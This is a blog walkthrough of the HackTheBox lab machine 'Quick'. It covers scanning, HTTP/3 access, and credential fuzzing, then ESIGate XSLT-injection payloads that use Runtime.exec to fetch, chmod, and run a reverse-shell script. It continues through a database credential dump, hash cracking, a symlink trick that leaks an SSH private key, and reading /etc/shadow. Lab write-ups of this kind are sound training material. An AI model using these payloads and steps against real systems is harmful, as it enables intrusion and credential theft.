HackTheBox Quick Writeup –

Hello and welcome back to my HackTheBox Writeup and Walkthrough series. In this writeup we look at the latest Linux machine Quick – The machine difficulty is categorized as HARD and obviously it is designed by MrR3boot.

HackTheBox Quick Writeup –


As always, I update my hosts file with machine IP as quick.htb and proceed to a quick nmap services scan.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 19:16 +03
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Scanning 9 services on quick.htb (
Service scan Timing: About 33.33% done; ETC: 19:35 (0:01:38 remaining)
Completed Service scan at 19:34, 102.57s elapsed (9 services on 1 host)
Initiating OS detection (try #1) against quick.htb (
Retrying OS detection (try #2) against quick.htb (
Retrying OS detection (try #3) against quick.htb (
Retrying OS detection (try #4) against quick.htb (
Retrying OS detection (try #5) against quick.htb (
Initiating Traceroute at 19:34
Stats: 0:18:39 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 19:34 (0:00:00 remaining)
Completed Traceroute at 19:35, 0.14s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 19:35
Completed Parallel DNS resolution of 2 hosts. at 19:35, 0.20s elapsed
NSE: Script scanning
Initiating NSE at 19:35
Completed NSE at 19:35, 16.98s elapsed
Initiating NSE at 19:35
Completed NSE at 19:36, 60.30s elapsed
Initiating NSE at 19:36
Completed NSE at 19:36, 0.00s elapsed
Nmap scan report for quick.htb (
Host is up (0.12s latency).
Not shown: 1991 closed ports
22/tcp    open          ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fb:b0:61:82:39:50:4b:21:a8:62:98:4c:9c:38:82:70 (RSA)
|   256 ee:bb:4b:72:63:17:10:ee:08:ff:e5:86:71:fe:8f:80 (ECDSA)
|_  256 80:a6:c2:73:41:f0:35:4e:5f:61:a7:6a:50:ea:b8:2e (ED25519)
9001/tcp  open          http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Quick | Broadband Services
443/udp   open|filtered https
16912/udp open|filtered unknown
18991/udp open|filtered unknown
19625/udp open|filtered unknown
26415/udp open|filtered unknown
30704/udp open|filtered unknown
37212/udp open|filtered unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Uptime guess: 45.117 days (since Mon Mar 16 16:48:28 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
1   133.72 ms
2   133.81 ms quick.htb (

The NMAP results shows a number of ports open. A web service services running on the part 9001. Hitting the port 9001 from browser I noticed a website “Quick | Broadband Services” running. A UDP port 443 is open but the rest 6 ports are filtered.

Upon enumerating the website I found following links:

  • http://quick.htb:9001/login.php – A Ticketing System Login Page
  • https://portal.quick.htb/ – A portal that supposed to be a new page the company is migrating and supports TLS and HTTP, however the page doesn’t open. I add this VHost to my hots file.
  • http://quick.htb:9001/clients.php – A list of clients, nothing interesting, however could be useful in the later stages.
  • I as well found some names in the home page possibly useful to authenticate ticketing system found earlier.
Quick Website | HackTheBox Quick Writeup –


I decided to run Dirbuster first and if it doesn’t come up with satisfying results, I decided to run other FUZZing tools. However after a few minutes of running Dirbuster before it died of intolerable errors the box is throwing , it showed following files

# root @ ns09 in ~/htb/quick [16:24:15] 
$ dirbuster 
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
File found: /index.php - 200
File found: /search.php - 200
File found: /home.php - 200
File found: /login.php - 200
File found: /clients.php - 200
File found: /db.php - 200
File found: /television.php - 502
File found: /icons/small/pipermail.php - 502
File found: /icons/OasDefault.php - 502
File found: /pa.php - 502
File found: /banner1.php - 502
File found: /preview/gallery.php - 502
File found: /icons/W.php - 502
File found: /tp.php - 502
File found: /icons/small/frontpage.php - 502
File found: /preview/html/28.php - 502

Hypertext Transfer Protocol (HTTP) over QUIC

No hints at this stage, I tried a couple of things, like SQLi and things like that, but noting worked. After looking back at the NMAP results, I realized that I missed the UDP port 443 which filters HTTPS. Another round of quick Google search I landed on a forum post in Sophos Community about a protocol called “QUIC“; is also pronounced “Quick” – oh, yeah… the machine name is as well “Quick” :). QUIC is a brand-new transport layer protocol developed by Google in 2012. A further search I completely understood that the machine uses HTTP/3 hence the part of website isn’t available for normal browsing.


So now everything is clear, I found a git repository by Cloudflare in GitHub, and realized that I must install the RUST programming language and Cargo book in order to proceed. Once the dependencies and the complete package is installed in my Kali, I can access the pages uses HTTP/3 Protocol. However, I’m wasn’t able to render the web page through my browser, but I can read the contents directly from my terminal using – like cURL.


As I’m installing the Quiche for the first time so it was really a painstaking task. It took a lot of time as there are multiple dependencies and packages that need to be installed in prior to the tool work properly. Mean-while I started to read few blog posts to understand how it works.

So finally everything is in place:

# root @ ns09 in ~/quiche on git:master o [1:37:10] C:101
$ cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- --no-verify https:/quick.htb/
   Compiling quiche v0.3.0 (/root/quiche)
   Compiling url v1.7.2
   Compiling syn v1.0.18
   Compiling mio v0.6.21
   Compiling regex v1.3.7
   Compiling serde_derive v1.0.106
   Compiling serde_with_macros v1.1.0
   Compiling env_logger v0.6.2
   Compiling serde v1.0.106
   Compiling serde_json v1.0.52
   Compiling serde_with v1.4.0
   Compiling docopt v1.1.0
   Compiling qlog v0.2.0 (/root/quiche/tools/qlog)
   Compiling quiche_apps v0.1.0 (/root/quiche/tools/apps)
    Finished dev [unoptimized + debuginfo] target(s) in 3m 41s
# root @ ns09 in ~/quiche on git:master x [2:20:32] 

Now I can read the vHost http://portal.quick.htb/ and the contents using Quiché which supposed to be running on HTTPS over the UDP.

Command To Run The Client:

cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- https://quic.tech:8443/

Accessing Index Page:

$ cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- --no-verify https:/quick.htb:443/
    Finished dev [unoptimized + debuginfo] target(s) in 0.40s
     Running `tools/apps/target/debug/quiche-client --no-verify 'https:/quick.htb/'`

<title> Quick | Customer Portal</title>
<h1>Quick | Portal</h1>
ul {
  list-style-type: none;
  margin: 0;
  padding: 0;
  width: 200px;
  background-color: #f1f1f1;

li a {
  display: block;
  color: #000;
  padding: 8px 16px;
  text-decoration: none;

/* Change the link color on hover */
li a:hover {
  background-color: #555;
  color: white;
<p> Welcome to Quick User Portal</p>
  <li><a href="index.php">Home</a></li>
  <li><a href="index.php?view=contact">Contact</a></li>
  <li><a href="index.php?view=about">About</a></li>
  <li><a href="index.php?view=docs">References</a></li>

Quick References Page:

# root @ ns09 in ~/quiche on git:master x [2:23:50] 
$ cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- --no-verify https:/quick.htb/index.php\?view\=docs
    Finished dev [unoptimized + debuginfo] target(s) in 0.44s
     Running `tools/apps/target/debug/quiche-client --no-verify 'https:/quick.htb/index.php?view=docs'`
<!DOCTYPE html>
<meta name="viewport" content="width=device-width, initial-scale=1">

<h1>Quick | References</h1>
  <li><a href="docs/QuickStart.pdf">Quick-Start Guide</a></li>
  <li><a href="docs/Connectivity.pdf">Connectivity Guide</a></li>

Contents From About Us Page:

<div class="about-section">
  <h1>Quick | About Us </h1>

<h2 style="text-align:center">Our Team</h2>
<div class="row">
  <div class="column">
    <div class="card">
      <img src="/w3images/team1.jpg" alt="Jane" style="width:100%">
      <div class="container">
        <h2>Jane Doe</h2>
        <p class="title">CEO & Founder</p>
        <p>Quick Broadband services established in 2012 by Jane.</p>

  <div class="column">
    <div class="card">
      <img src="/w3images/team2.jpg" alt="Mike" style="width:100%">
      <div class="container">
        <h2>Mike Ross</h2>
        <p class="title">Sales Manager</p>
        <p>Manages the sales and services.</p>
  <div class="column">
    <div class="card">
      <img src="/w3images/team3.jpg" alt="John" style="width:100%">
      <div class="container">
        <h2>John Doe</h2>
        <p class="title">Web Designer</p>
        <p>Front end developer.</p>

Downloading PDFs Found In The References Page

# root @ ns09 in ~/quiche on git:master x [12:28:05] 
$ cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- --no-verify https:/quick.htb/docs/Connectivity.pdf >> Connectivity.pdf
    Finished dev [unoptimized + debuginfo] target(s) in 0.44s
     Running `tools/apps/target/debug/quiche-client --no-verify 'https:/quick.htb/docs/Connectivity.pdf'`

# root @ ns09 in ~/quiche on git:master x [12:28:14] 
$ cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- --no-verify https:/quick.htb/docs/QuickStart.pdf >> QuickStart.pdf    
    Finished dev [unoptimized + debuginfo] target(s) in 0.42s
     Running `tools/apps/target/debug/quiche-client --no-verify 'https:/quick.htb/docs/QuickStart.pdf'`

# root @ ns09 in ~/quiche on git:master x [12:28:56] 
$ ls -la
total 9440
drwxr-xr-x  12 root root    4096 May  1 12:27 .
drwxr-xr-x 149 root root   16384 May  1 12:29 ..
-rw-r--r--   1 root root  251490 May  1 12:27 Connectivity.pdf
-rw-r--r--   1 root root       0 May  1 12:27 QuickStart.pdf

The PDF Connectivity is a guide that shows how to connect to the service. It reads as follows:

As the guide states I need to have registered email ids and the password listed in order to connect. I have the password but email ids I need to find. So I proceed to scrape from the website all possible email ids and domain names make a wordlist. I scraped from pages visible in the http://quick.htb:9001 and from the other pages.


Once the list is ready, I used WFUZZ against the word list as payload and the possible matching password. Within a couple of seconds WFUZZ returns with right match and successfully logged-in to the Ticketing System.

I raised a test ticket, and I was given a number, I was able to search this number and see the status from home page.

The page doesn’t reveal what Ticketing System it is running on, so I know using Burp I could see HTTP header where it should have the required information.

Well, the application running on ESIGate – a well-known Web accelerator and Web App integration tool.

Exploiting ESIGate

Another round of quick Google search showed a couple of exploits. The PoC s confirms that ESIGate is vulnerable to XSLT-Injection and it is possible to do Remote Code Execution (RCE). (CVE-2018-1000854)

CVE-2018-1000854 In Details:

esigate.org ESIGate version 5.2 and earlier contains a CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’) vulnerability in ESI directive with user specified XSLT that can result in Remote Code Execution. This attack appear to be exploitable via Use of another weakness in backend application to reflect ESI directives. This vulnerability appears to have been fixed in 5.3.

After reading a couple of POCs this blog post shows how the exploit can be done. The attack goes like this: The attacker must be able to reflect a value with XML tags inside a page that is cached. Once a reflected value is found on the site, the following payload is reflected by the attacker in the HTTP response.

My plan is to create multiple tickets and intercept the request using Burp and uploading a malicious XSL (Stylesheet – Extensible Stylesheet Language) with my payload and injection into it. For each ticket I will deliver my own XSL will have a different command to execute. When each ticket associated with is searched from Search Ticket search bar it will execute the XSL and run the payload in it.

  1. Import the Remote Shell Script
  2. Assign the execution permission
  3. Run the reverse shell

I made 3 XSL files using EditPlus on my Windows Host and moved them to working directory of Quick in my Kali machine.

NS1.xsl – Import the RS.SH

<?xml version="1.0" ?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<xsl:variable name="cmd"><![CDATA[wget]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/> Process: <xsl:value-of select="$process"/> Command: <xsl:value-of select="$cmd"/> 

NS2.xsl – Assign the execution permission

<?xml version="1.0" ?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<xsl:variable name="cmd"><![CDATA[chmod +x rs.sh]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/> Process: <xsl:value-of select="$process"/> Command: <xsl:value-of select="$cmd"/> 

NS3.xsl – Run the reverse shell script

<?xml version="1.0" ?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<xsl:variable name="cmd"><![CDATA[./rs.sh -e /bin/bash 9999]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/> Process: <xsl:value-of select="$process"/> Command: <xsl:value-of select="$cmd"/> 

Running Python Simple HTTPServer and Listener



The below request is as simple as it looks. Creates a ticket with REQUEST”X” and the message including the custom external XML link and the external XSL style sheet link. The payloads end with my own ticket number that forces application to generate. This custom payload executes when I search the ticket one by one in order.

Payloads for each request:


Request 1

Request 2

Request 3

Executing The Payloads – Request1 associated with ticket #1111 – Importing rs.sh script.

Executing the Request1 to import the reverse shell command. This can be directly executed from the search button or from the browser link. When I hit enter the below command execute my script included in the REQUEST1 sent . This will initiate WGET command to import the hosted rs.sh (reverse shell bash script) from my Python SimpleHTTPServer. I can see the server was hot by a GET request from

Command: http://quick.htb:9001/search.php?search=TKT-1111

Executing The Payloads – Request2 associated with ticket #2222 – Execute permission to rs.sh script.

Command: http://quick.htb:9001/search.php?search=TKT-2222

This request assigned execution permission to my rs.sh script. This will allow me to run the script in 3rd step.

Executing The Payloads – Request3 associated with ticket #3333 – Execute the rs.sh script.

Command: http://quick.htb:9001/search.php?search=TKT-3333

When I run this command the the payload in 3rd request gets executed and the bash script and the port assigned in my listener gets the reverse shell as SAM.

As soon as I run the 3rd command from the browser I got the connection back in my listener as SAM. The user.txt was found in the SAM’s desktop and I immediately obtained it.

Privilege Escalation

So the things were bad earlier and it will go a bit smooth from now onwards. I believe the user was the longest process ever I encountered in the HTB, however it was fin and I learned a lot of new things, I must thank to the creator.

MySQL Database Dump

A manual enumeration led me to different folders, I found a php (index.php) file which possibly a db connector in printers folder where I found the following:

And without any success for another couple of hours I found the following in Apache2 directory. A new vHost “printer2.quick.htb”

I started to enumerate the box for more hints, and I was on the WWW folder and noticed the db.php file. If I recall correctly I had found this file in WFUZZ in initial enumeration and decided to look at it.

This file has a MySQL database connection settings with clear text local user credentials. However, I wasn’t able to connect it from my Kali, so decided to do connect locally from user SAM.

After trying to connect to MySQL and failing each time, I was finally able to connect to the MySql database.

And I finally able to read the 2 users and thier password hashes.

I tried to crack the hash using different mediums but unfortunately couldn’t do it. After a long research and looking for help in the different forums, I found a PHP MD5 Decrypt script in the GitHub. However, it doesn’t work out-of-the-box, I had to make several amendments and changes. After working on an hour; I finally made a script that cracked Server Admin password hash. But the script is not complete as I get errors every time I run, but it gives result 🙂

I finally have a the password: yl51pbx

All my hard-work so far didn’t help much, I wasn’t able to use the password I just cracked. So I had to move forward to find other possibilities.


A friend in Discord told me that as the printer2.quick.htb runs in the local host, so I need to run the SSH to local host and port80 and try. I immediately found a way to do it and in next few minutes I was able to see printer’s login page locally. As we were discussing, we found the option to add new printer that accept custom port. Another friend of him also suggested that user SAM has full read and write access to the directory /var/www/jobs so the plan is to create a Symbolic Link. The link will pull the SRV Admin Private key when it is clicked.

I create the file and add the new printer with my netcat listening port. And from assign the job, I initiate the job I just created as SIMLINK.

Adding New Printer

As soon as I access the link http://printerv2.quick.htb/job.php and click on Print, my listener is activated and I have the Private_Key from the user SRVADM. This key will allow me to SSH the box as


I add the private key to my ssh and managed to log in the system as ServerAdmin.

After a little enumeration I found the file in srvadm@quick:~/.cache/conf.d$ cat printers.conf, I read the file and found another set of credentials.

Hello and welcome back to my HackTheBox Writeup and Walkthrough series. In this writeup we look at the latest Linux machine Quick - The machine difficulty is categorized as HARD and obviously it is designed by MrR3boot.


Obtaining Root.txt

And I used the password just obtained to SU to root and grab the root.txt

That’s all, what a ride. I definitely enjoy this machine and learned a lot of new things, all thanks to MrR3boot and a couple of mates who helped me all the way. We learn together and we hack together. Thanks for dropping by and reading my article. Come back soon.

root@quick:/# cat etc/shadow
root@quick:/# ^C


Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Notify of
Newest Most Voted
Inline Feedbacks
View all comments
5 months ago

on request1 you mentioned that it’s used to import the nc.exe. but later you mentioned that you use the request1 to import your .sh

Sorry, that action is blocked.